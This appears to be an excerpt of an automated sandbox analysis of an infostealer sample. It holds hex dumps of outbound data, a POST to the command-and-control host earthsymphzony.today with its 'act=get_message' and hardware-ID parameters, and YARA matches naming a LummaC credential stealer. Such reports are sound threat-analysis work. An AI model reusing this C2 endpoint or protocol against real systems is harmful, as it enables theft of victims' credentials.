                                                                                                      2025-03-05 08:17:20 UTC15331OUTData Raw: 2d a0 8e 1f 5f 3f 9c 05 6f 16 3a 15 90 e1 57 ea 0d 40 4b 8b 4a 2a 45 6b 46 2c 7e 50 e0 02 48 7e 1a 15 13 9b b0 be e3 1f b7 de bd d7 99 f3 37 76 21 74 01 d1 a8 4f b7 a4 b6 f0 f3 9d 55 c4 15 8e ca 92 4c 88 98 7e cc ac d0 9f 9a df 4e aa 66 56 8a b1 84 0f 89 ae f2 82 41 4e 2f 6c af d3 6a 3e bb a2 bd af 5d d8 d1 b9 1c 03 ce a6 8e 65 ad 1f 62 d9 a0 0d 2c c2 89 8f 14 6e 54 7d 77 38 c9 45 b7 b9 b2 a7 da 04 93 86 20 da 74 bd 5a b5 65 09 72 44 4f 8c 0a cd 4e a8 2f 4e 8b d3 29 df 48 df 8c 1a d3 d9 cd 98 94 70 79 a5 ac 15 e5 03 7b 7a 20 ea 77 4c 32 30 6a 83 39 89 89 a7 0f 37 b2 e9 fa e1 e7 a2 fe 9a 3f de a6 0d a1 17 7d de 9c 86 ca 9b bc e2 20 17 94 08 9d f6 0c 41 63 11 bb 1f fc 00 3b a2 ca b8 e8 f7 c5 a9 53 83 fb 20 fb c8 b2 9d 96 3f 94 51 76 38 fc e2 2f ba df 72 9b
                                                                                                      Data Ascii: -_?o:W@KJ*EkF,~PH~7v!tOUL~NfVAN/lj>]eb,nT}w8E tZerDON/N)Hpy{z wL20j97?} Ac;S ?Qv8/r
                                                                                                      2025-03-05 08:17:20 UTC15331OUTData Raw: 1d 9b 49 f3 b5 27 b9 9e ca a8 a9 fd a0 7a 3b 3d eb f4 8c 74 c7 04 aa 71 98 80 9d f1 c0 7e 94 b7 1a 81 0b 85 c6 71 73 51 39 6a a9 2c e3 d5 52 56 20 c5 0e 8c b4 63 a2 fd c5 0e de 36 24 a8 39 84 13 6c a6 0d 44 4c 35 d3 58 9d 60 75 55 6a 38 50 21 2a b0 17 9d bd 62 be dc 9c 02 bb 6e ff 18 a0 9c f7 b4 0f 37 6c 0c 63 67 73 02 bf 3f b9 c5 70 01 5b cc 63 38 c4 91 eb 75 78 66 d0 05 62 55 19 dd ce 3f f5 ae cc fc 06 56 fa 65 07 02 12 d6 c0 99 bc 0e 7d 83 10 93 29 f1 04 84 2e 1a ee e5 76 9e aa 66 69 fd a8 18 57 7c e9 65 47 1f de 0f 8a b8 d7 72 aa c5 38 e1 b6 85 56 03 2d 08 e6 e0 60 07 3f 96 c8 92 30 2b b7 94 e5 d3 37 4b ce 4e 7f 1e c4 96 c1 ad 36 2c b0 5d b7 d3 8c c0 a5 28 02 a5 e5 15 ab 7c 6c 64 3b 0d 44 e0 24 c3 03 1d 52 29 91 41 d6 d8 7a 9f bf 3d 70 41 c6 4b 93 87
                                                                                                      Data Ascii: I'z;=tq~qsQ9j,RV c6$9lDL5X`uUj8P!*bn7lcgs?p[c8uxfbU?Ve}).vfiW|eGr8V-`?0+7KN6,](|ld;D$R)Az=pAK
                                                                                                      2025-03-05 08:17:20 UTC15331OUTData Raw: 8d 37 f1 b4 f8 a0 10 15 d8 90 1a 78 15 29 56 e0 70 18 00 cf bf eb e2 2c f7 68 0a cd 0a 03 35 ee 74 c9 fe f5 a3 a0 58 64 ec 02 a0 a5 de 1f 22 1f 4f a4 69 b8 d3 2d 0f bb d5 01 4a 42 19 90 83 28 15 29 53 e9 2f d4 5a 9e ef 07 46 45 d9 27 03 00 7e d4 65 66 2e fe 16 2e 79 8a 12 1a 4d 89 26 63 00 3f 32 1e 11 97 0d ac c7 bf 48 b2 67 64 95 49 22 5a 08 ba 5b a8 bd 33 f9 81 b0 18 80 4d ef 5b 7b 29 96 ac 55 e8 3f fd 99 ce 14 f0 26 d4 04 31 0f b4 5e 3d 63 9c e7 39 77 f3 7d 39 39 90 e3 c2 07 47 c2 2e 42 b0 ab ab 10 12 88 b2 97 d3 40 e1 38 dd c1 18 41 89 0e f4 df 12 59 98 19 22 c2 cc 28 c6 e9 bb e2 4a ec 3f 97 9d 84 4d f9 9c 91 52 ea 99 ee 29 ca 27 a8 86 b8 8c dc 0b 72 d0 69 f2 fc ac 54 f8 21 ad 05 dd fc 93 63 f9 b2 fe a9 5c 1b 20 52 0c ca b8 87 30 37 dc 91 63 69 b4 d6
                                                                                                      Data Ascii: 7x)Vp,h5tXd"Oi-JB()S/ZFE'~ef..yM&c?2HgdI"Z[3M[{)U?&1^=c9w}99G.B@8AY"(J?MR)'riT!c\ R07ci
                                                                                                      2025-03-05 08:17:20 UTC15331OUTData Raw: 69 de 25 97 f0 14 f4 97 50 f3 82 3e fa ab 25 4d cd 2d b9 67 22 39 44 5c e6 cd 09 ed 56 5d 91 ad 7d 08 c4 67 d3 2e 3b e7 f0 ac 83 38 b9 bf b3 03 99 4f a8 3c e3 91 4d 6f 35 bb 63 9a 7c f3 a2 e0 91 7e e1 66 c6 7e 29 c2 42 cf 1b f2 ec 35 c2 a0 15 44 8d 09 94 5c 12 91 1e 1b de e1 9e 99 ce 30 f7 c9 59 20 cc 01 db 3d f4 be 5d 73 ff 7a 2c 1d ff 79 1c 5f 71 d7 9d c8 8b 98 0b 7e 1c 82 06 65 28 3d 86 68 77 fc 62 b7 72 93 21 cd c0 8c 2c c3 da c5 ae d7 ee 55 58 7b 14 40 2b 97 91 7a 1f 40 6f 39 02 eb 5c 36 4f 51 ca 50 75 37 9a cc bf dd 10 e2 a4 24 f4 e5 de f9 8b b3 59 ed 2e ea c8 ac c1 24 0d 62 cc 5d ed 16 97 c1 09 60 6b 47 6d 08 e6 df 2a 46 a6 7a d5 46 87 3d b6 51 f2 9b 42 8b 57 89 59 a7 85 dd e0 1c 1f 92 ac d3 c3 18 17 0a 97 d9 41 f2 96 bd d3 c2 5f 64 37 fa 44 9b 19
                                                                                                      Data Ascii: i%P>%M-g"9D\V]}g.;8O<Mo5c|~f~)B5D\0Y =]sz,y_q~e(=hwbr!,UX{@+z@o9\6OQPu7$Y.$b]`kGm*FzF=QBWYA_d7D
                                                                                                      2025-03-05 08:17:20 UTC15331OUTData Raw: 4d 30 f5 aa b0 c3 ac 44 87 aa ec 55 4f 8f b8 b0 f2 30 33 df 81 a7 69 6d 97 d7 3d 9e 44 02 2f 27 4d e0 a6 cc 0d b6 ea a7 2a c1 7c 84 7f 9c 30 3c f4 cc b3 46 e6 23 77 73 ba ed 1f 4b 43 19 07 82 c9 0e f1 42 ce 9c 31 06 d2 48 fd 52 7e 02 b7 90 67 e4 cb aa 77 d5 e5 f2 0d 36 cc 2f 4c f3 b6 87 4e 29 5b 24 6a 27 a8 e9 c8 26 1c 36 1c 39 f6 ce 9c c6 aa de 3e 5b f6 61 5e fb e2 38 46 3a d2 c4 8a 92 c9 68 1e fc 49 a3 ff 83 87 c9 1a b4 25 0c aa d0 91 ff db 48 3b 23 c9 b7 76 dd 83 f5 2f 92 56 1c be 50 28 08 26 8c 28 19 50 66 47 e3 fa 3b ac 51 9d 12 08 f9 f8 5a ff c5 4f 19 ea 36 1f ed 26 ad f0 b4 b2 8a 22 74 68 06 8f b8 64 41 a4 54 bd ad 85 e3 f5 32 0b 66 28 69 34 b2 3b da a3 63 d5 59 81 d6 89 96 be 0b ec 80 39 39 77 21 09 58 3d 8b e8 58 74 76 a0 59 61 ba a3 52 c3 b0 68
                                                                                                      Data Ascii: M0DUO03im=D/'M*|0<F#wsKCB1HR~gw6/LN)[$j'&69>[a^8F:hI%H;#v/VP(&(PfG;QZO6&"thdAT2f(i4;cY99w!X=XtvYaRh
                                                                                                      2025-03-05 08:17:20 UTC15331OUTData Raw: e7 d4 33 f8 fb dd 1e bf 0e f8 7a 37 47 77 8c f5 b2 4e 37 6a bc f7 be 40 a4 75 57 7a bd af 9f 64 66 25 57 5a aa be ca 3f 9a 98 5d 73 02 1b bf 2a 93 f3 d6 eb b9 75 6b a8 26 da fd 10 b7 48 8d 79 50 8d 2f cb 5a 03 b5 d1 fe 3b a7 ee 69 25 94 93 51 da 0f 99 d7 99 25 ec ca 5b 6e 95 7c e0 d2 6f ab 10 5a f3 41 8b 3b d6 c4 b6 4f dd c8 21 b6 96 0b 64 ef 39 b9 5e d1 c2 56 a7 c8 66 a6 bb 23 f6 ad 64 c7 59 0e 04 63 17 27 50 a5 68 62 a7 84 39 90 be bb 0d 07 bb 37 18 a0 db 0d 4f 5b c9 88 78 55 d0 be 84 4b 40 24 69 71 4a e0 0c 9d f5 d9 14 d6 eb d4 bf a7 b9 9f fc 06 f2 0a cd 32 78 cf 12 da 48 96 74 c2 f1 51 b9 96 df 08 e6 b8 96 5b ec 09 f7 41 b1 d9 fe b2 e0 af 80 99 d1 2f 86 64 2a 9b 69 8a 30 90 3a 67 0d c3 99 85 03 55 3d 74 43 89 4e 71 ce 6f 1d 9e 38 08 0b a0 41 99 e9 9e
                                                                                                      Data Ascii: 3z7GwN7j@uWzdf%WZ?]s*uk&HyP/Z;i%Q%[n|oZA;O!d9^Vf#dYc'Phb97O[xUK@$iqJ2xHtQ[A/d*i0:gU=tCNqo8A
                                                                                                      2025-03-05 08:17:20 UTC15331OUTData Raw: 71 37 55 18 2a 33 1d e3 4e aa a8 04 1f 2f 91 e0 1c 45 da c0 70 1e c4 c6 d8 66 69 08 5c b7 70 b0 55 8c 7c 15 37 df d9 a6 cb d8 5c ff e3 a0 88 3b 53 1c cd b3 af 67 f0 e5 ac 49 56 fd 6a f1 d6 dc b2 9b ea a2 35 93 67 ec de 26 85 f2 d0 e2 5e e5 4c e7 62 bb 8c 68 3d a7 14 2f 6b e7 f7 02 02 79 d7 50 ef 18 f5 ad 12 c5 da d8 37 3c 77 f3 74 78 ef 6e c5 3e 86 65 ea d0 59 44 a7 6c 02 ee 19 fb a0 b9 d9 f3 d3 56 43 b8 66 c0 54 ab 39 a0 77 27 be 8e d2 2a d8 b0 5e 6c 38 bf f6 8d e9 66 49 8b 34 4c 84 fb bf 89 62 fe 04 61 68 44 4e ec 8e ef e1 2c 0d 89 a7 40 86 5f e5 d7 b1 ab 6f 71 73 2e ce 73 1c 9e 8e 5a 5f 21 d4 3c 2c 74 f0 3d 6b 14 da d5 c1 b1 eb 67 26 bc f4 49 f6 1e aa 57 b0 ee 0b 4a da fc bc 58 84 11 da 4c a0 1b ce c4 78 cd 75 bd 6b 53 d7 e0 5c a9 9e ce fc e0 22 b2 d8
                                                                                                      Data Ascii: q7U*3N/Epfi\pU|7\;SgIVj5g&^Lbh=/kyP7<wtxn>eYDlVCfT9w'*^l8fI4LbahDN,@_oqs.sZ_!<,t=kg&IWJXLxukS\"
                                                                                                      2025-03-05 08:17:20 UTC15331OUTData Raw: 8a 08 08 be ed 39 56 e7 bb b5 3e 59 38 e0 2c 51 a6 0a 79 23 53 0c 6c a5 a0 96 0e 2a 65 d1 a9 75 2b bb 28 b9 08 f2 30 2b fb 59 7d 48 c0 7e 2f 11 cd ca b9 47 b5 97 a9 b3 d0 74 61 7b cf 11 94 9d 4a 27 66 87 7e 99 a7 12 63 36 41 b4 3b 7c 9e 8e 2d 73 91 8f ce fb 64 56 2c d1 60 42 29 45 db 83 5c 1f cc 2f 76 9e ae 16 9f 18 a8 93 c4 81 5c 5a b2 36 6c f9 db bd 61 52 bf 15 25 33 92 dc 2a d4 20 d6 dd 87 cf c7 28 4b 10 09 13 68 f1 8d 45 39 6b da da 2f 7b 7b 62 e6 61 5c bf d4 e5 c1 28 97 ef 1f 5c 32 78 d1 a9 c1 15 cd 5a c5 4c 95 96 0e 59 24 e4 09 62 fd 02 dc 13 a3 f6 1f c8 3f ba 6b 6a 81 f7 2d 74 50 17 e4 3a c1 3e 38 fe f8 2e 26 2f 9b 26 a0 d5 27 f3 d6 0f 7d ad 84 e0 a9 64 08 cc d8 cc 6f e6 4b 0a 8b 4e 66 3e 23 ac cd e6 a6 41 6f 6e c8 b8 4d 74 00 26 df 3e a8 97 7b 02
                                                                                                      Data Ascii: 9V>Y8,Qy#Sl*eu+(0+Y}H~/Gta{J'f~c6A;|-sdV,`B)E\/v\Z6laR%3* (KhE9k/{{ba\(\2xZLY$b?kj-tP:>8.&/&'}doKNf>#AonMt&>{
                                                                                                      2025-03-05 08:17:20 UTC15331OUTData Raw: 55 bc d6 b4 1c fd 1b b7 b1 98 12 0c 4a 10 10 47 b1 ac 0f 05 e6 7d 18 2a 0c d0 de 9d 5e f5 cb 76 79 72 7e 62 be 8a 5d 19 7d bf d5 88 71 3d a4 2f eb fd 12 3b 60 f5 7e 1a 34 a4 35 cd 73 b2 46 8a 4a f5 1e 83 d8 18 70 ab 84 a5 27 08 b1 99 4b bf fe df e2 31 0f 18 70 0c b8 e1 dc 14 68 33 25 8a 39 cf 37 0b b7 99 45 d3 73 56 8f 02 ab aa 99 d9 cc d5 ef f0 43 61 20 da 95 eb 57 bf 2f 17 42 06 48 96 7c 04 54 23 13 d9 d1 da 39 e9 02 84 cc f2 c1 4d c5 87 7b 78 47 04 54 9c b9 4e 7d db 0c 53 dd 14 f5 bd 45 6e e1 42 e3 17 b5 4a 87 67 8f 8f 08 d8 9e 6d e2 e5 4c 9d fb bc 43 b4 fe dd 28 2c e3 c4 05 1c 24 da 5c e2 f3 2c fe 49 78 da 0d 39 20 40 37 7c 2c 09 5e bf 14 1a de 4b 68 08 e6 61 9c d1 40 ea c3 34 8f 5b f9 26 69 24 ba 39 c8 bc 88 02 57 64 38 38 25 34 13 26 f2 02 4f a3 33
                                                                                                      Data Ascii: UJG}*^vyr~b]}q=/;`~45sFJp'K1ph3%97EsVCa W/BH|T#9M{xGTN}SEnBJgmLC(,$\,Ix9 @7|,^Kha@4[&i$9Wd88%4&O3
                                                                                                      2025-03-05 08:17:22 UTC836INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 05 Mar 2025 08:17:22 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T1pKwGHCeGDErisk5TlMg%2Fx7yJJYFOOF%2Fss0tLV%2FeRZqEDQ7aS3MPMHk%2FGAuvUsNUhl0FZBBi1CiB1Cp%2FX901zwYsxo8z%2FQO3x6X6b0CFQwUo78HHpSCt%2FILrp02ZEwsl7i4qZ51Yg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 91b82d2a4863c358-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1568&rtt_var=631&sent=202&recv=598&lost=0&retrans=0&sent_bytes=3065&recv_bytes=586693&delivery_rate=2512908&cwnd=153&unsent_bytes=0&cid=93ecbaf1cb375c51&ts=1523&x=0"


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      7192.168.2.749857104.21.64.14436644C:\Users\user\Desktop\random(2).exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-03-05 08:17:22 UTC357OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/api
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 77
                                                                                                      Host: earthsymphzony.today
                                                                                                      2025-03-05 08:17:22 UTC77OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 77 31 53 6c 46 2d 2d 26 6a 3d 26 68 77 69 64 3d 44 33 41 32 46 34 43 39 34 34 46 41 30 45 32 42 33 44 31 38 38 35 41 39 33 31 43 41 43 32 45 33
                                                                                                      Data Ascii: act=get_message&ver=4.0&lid=tw1SlF--&j=&hwid=D3A2F4C944FA0E2B3D1885A931CAC2E3
                                                                                                      2025-03-05 08:17:23 UTC825INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 05 Mar 2025 08:17:23 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bmou721MFFcZ%2BVhtwkLBqf6wgn3MCuG7fX8nABsmtEVFZo5I2kUHS%2B90Lo8eymWFSUPMpO7iCjW1G8oAEmduEib5nZFEm%2FQwC%2FALXRs5lUrLZs%2B5mEDRLShzbcXhJULqpB048a3o1A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 91b82d37296414a8-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2006&min_rtt=2002&rtt_var=758&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3065&recv_bytes=1070&delivery_rate=2153392&cwnd=152&unsent_bytes=0&cid=5d249c41762dea96&ts=502&x=0"
                                                                                                      2025-03-05 08:17:23 UTC54INData Raw: 33 30 0d 0a 4e 6d 68 32 62 39 61 36 64 67 5a 54 6b 65 72 62 55 6d 68 39 34 74 65 33 6f 56 79 31 31 2b 2b 77 6e 48 66 77 6a 4f 77 4b 55 62 5a 74 4e 51 3d 3d 0d 0a
                                                                                                      Data Ascii: 30Nmh2b9a6dgZTkerbUmh94te3oVy11++wnHfwjOwKUbZtNQ==
                                                                                                      2025-03-05 08:17:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Target ID:0
                                                                                                      Start time:03:16:51
                                                                                                      Start date:05/03/2025
                                                                                                      Path:C:\Users\user\Desktop\random(2).exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\random(2).exe"
                                                                                                      Imagebase:0x5e0000
                                                                                                      File size:1'835'008 bytes
                                                                                                      MD5 hash:4C7602A935A7B24E6262ACD38505EB9A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1542414145.0000000001207000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1546935640.000000000120D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1355119722.000000000120A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1366561400.0000000001207000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1594325672.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1365385074.0000000001207000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.1293558753.0000000005020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Disassembly

                                                                                                      Reset < >